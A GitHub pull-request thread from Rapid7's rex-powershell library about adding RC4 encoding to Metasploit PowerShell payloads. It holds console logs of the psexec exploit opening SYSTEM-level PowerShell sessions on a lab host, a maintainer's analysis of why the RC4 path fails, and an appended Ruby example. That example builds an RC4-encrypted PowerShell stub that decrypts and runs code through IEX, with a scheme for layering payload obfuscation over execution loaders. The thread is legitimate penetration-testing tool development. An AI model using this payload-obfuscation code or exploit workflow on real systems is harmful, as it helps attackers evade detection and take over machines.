rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Add option to use rc4 encoding #23

Closed bwatters-r7 closed 3 years ago

bwatters-r7 commented 4 years ago

This is a first step to supporting https://github.com/rapid7/metasploit-framework/pull/11257 by adding the option to use rc4 encoding. Together, they are still broken, so I am marking this as a draft. Please see the framework PR at https://github.com/rapid7/metasploit-framework/pull/11257 for testing strategies.

gwillcox-r7 commented 3 years ago

Right, well, on the plus side this appears to be working fine call-wise, though results are still not as expected, as mentioned in the comment above: RC4 still does not appear to be working, though all other methods are working fine.

msf5 exploit(windows/smb/psexec) > set powershell::method msil
powershell::method => msil
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 3 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:16:55 -0500

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 3 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set powershell::method old
powershell::method => old
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 4 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:17:18 -0500

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 4 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set powershell::method rc4
powershell::method => rc4
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > set Powershell::method reflection
Powershell::method => reflection
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 5 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:18:19 -0500

PS C:\Windows\system32> id
PS C:\Windows\system32> id : The term 'id' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the 
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ id
+ ~~
    + CategoryInfo          : ObjectNotFound: (id:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 5 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set Powershell::method rc4
Powershell::method => rc4
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > 

Considering this is MSF5 though and I'm using the code from https://github.com/rapid7/metasploit-framework/pull/11257 I am curious if any of the recent additions will alter this. Going to try rebasing the other PR. Not sure if this branch needs much rebasing though.

gwillcox-r7 commented 3 years ago

Hmm still getting the same results even with the update to the latest code. Definitely something odd going on here.

smcintyre-r7 commented 3 years ago

This is failing because the RC4 template is the only template that expects the "payload" to be powershell code instead of native x86 or AMD64 code. If you look at the other templates for net, reflection, msil, etc. they all treat the payload as code in the native architecture. The RC4 template on the other hand has no such logic to execute a native payload.

This kind of makes sense because the other "methods" are all means by which the native payload can be executed, not obfuscated. RC4 isn't an execution method and that's reflected in its template. That is to say that the usage of the RC4 template code is not mutually exclusive with the other methods, which take native x86 or AMD64 code and yield a powershell blob to run it.

You can test this principle by updating:

      when 'rc4'
        Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, pay)

to

      when 'rc4'
        Rex::Powershell::Payload.to_win32pe_psh_rc4(
          template_path,
          Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
        )

Since these aren't mutually exclusive, and we still need a way to execute the native payload, using the RC4 stub would need to be added in as a boolean flag and processed after the method is. If we were going to add other stubs that modify the powershell code in the future, we'd ideally be able to have them specified as some kind of an ordered specifier like rc4:msil to imply "use the RC4 wrapper on top of the MSIL method". This would complicate tab completion though.
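As an added illustration of the layering described in the comment above (this is example code, not code from rex-powershell or metasploit-framework), the following Ruby models an execution method composed with the RC4 wrapper through an ordered spec such as rc4:msil. The names EXEC_METHODS, WRAPPERS, build_powershell, wrap_rc4 and unwrap_rc4 are hypothetical; the two loader bodies are placeholders standing in for Rex::Powershell::Payload.to_win32pe_psh_msil and friends, and the RC4 key and the sample native bytes are constructed for the example. It also reproduces the failure from the thread: feeding native bytes straight into the RC4 wrapper yields a stub whose decrypted content is raw shellcode, which is what Invoke-Expression would be handed.

```ruby
# Added example, not rex-powershell or metasploit-framework code. Execution
# methods (msil, reflection, ...) turn native x86/x64 code into PowerShell;
# RC4 turns PowerShell into PowerShell, so "rc4:msil" must run the execution
# method first and put RC4 on top. All names below are hypothetical.

# Pure-Ruby RC4 (KSA + PRGA). RC4 is symmetric, so the same call decrypts.
def rc4(key, data)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.length]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  out = data.bytes.map do |b|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    b ^ s[(s[i] + s[j]) & 0xff]
  end
  out.pack('C*')
end

# RC4 wrapper: takes PowerShell *source* and returns a PowerShell stub that
# rebuilds the keystream, decrypts the blob in memory and hands the plaintext
# to Invoke-Expression. The key is embedded in a single-quoted literal, so it
# is restricted to alphanumerics here.
def wrap_rc4(ps_code, key)
  raise ArgumentError, 'key must be alphanumeric' unless key.match?(/\A[A-Za-z0-9]+\z/)
  blob = [rc4(key, ps_code)].pack('m0') # strict base64, no newlines
  <<~PS
    $k = [Text.Encoding]::ASCII.GetBytes('#{key}'); $c = [Convert]::FromBase64String('#{blob}')
    $s = 0..255; $j = 0
    0..255 | % { $j = ($j + $s[$_] + $k[$_ % $k.Length]) % 256; $t = $s[$_]; $s[$_] = $s[$j]; $s[$j] = $t }
    $i = 0; $j = 0
    $o = foreach ($b in $c) { $i = ($i + 1) % 256; $j = ($j + $s[$i]) % 256; $t = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $t; $b -bxor $s[($s[$i] + $s[$j]) % 256] }
    IEX ([Text.Encoding]::ASCII.GetString([byte[]]$o))
  PS
end

# Recovers what the stub would hand to IEX; used to check layering offline and
# to show the failure mode from the thread without running anything.
def unwrap_rc4(stub, key)
  blob = stub[/FromBase64String\('([A-Za-z0-9+\/=]+)'\)/, 1]
  raise ArgumentError, 'no RC4 blob found in stub' unless blob
  rc4(key, blob.unpack1('m0'))
end

# Placeholders for the execution methods: each takes native code and yields a
# PowerShell loader for it (the real ones are Rex::Powershell::Payload.to_win32pe_psh_*).
EXEC_METHODS = {
  'msil'       => ->(native) { "# msil loader (placeholder)\n$p = [Convert]::FromBase64String('#{[native].pack('m0')}')\n" },
  'reflection' => ->(native) { "# reflection loader (placeholder)\n$p = [Convert]::FromBase64String('#{[native].pack('m0')}')\n" }
}.freeze

# Wrappers take PowerShell and yield PowerShell; they are not execution methods.
WRAPPERS = { 'rc4' => ->(ps, key) { wrap_rc4(ps, key) } }.freeze

# Ordered spec as suggested in the thread: 'rc4:msil' means "RC4 on top of msil".
# The last element must be an execution method; everything before it is a
# wrapper, applied from innermost (right) to outermost (left).
def build_powershell(spec, native, key: 'Key')
  parts = spec.split(':')
  method = parts.pop
  raise ArgumentError, "#{method.inspect} is not an execution method" unless EXEC_METHODS.key?(method)
  unknown = parts.reject { |w| WRAPPERS.key?(w) }
  raise ArgumentError, "unknown wrapper(s): #{unknown.join(', ')}" unless unknown.empty?
  ps = EXEC_METHODS[method].call(native)
  parts.reverse_each { |w| ps = WRAPPERS[w].call(ps, key) }
  ps
end

if $PROGRAM_NAME == __FILE__
  shellcode = "\x90\x90\xcc".b # constructed stand-in for native x86 bytes
  puts build_powershell('rc4:msil', shellcode)
end
```

Running build_powershell('msil:rc4', ...) or build_powershell('rc4', ...) raises, because 'rc4' is not an execution method, which is exactly the mismatch that produced "Exploit completed, but no session was created" in the console log above.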

bwatters-r7 commented 3 years ago

Moved to https://github.com/rapid7/rex-powershell/pull/30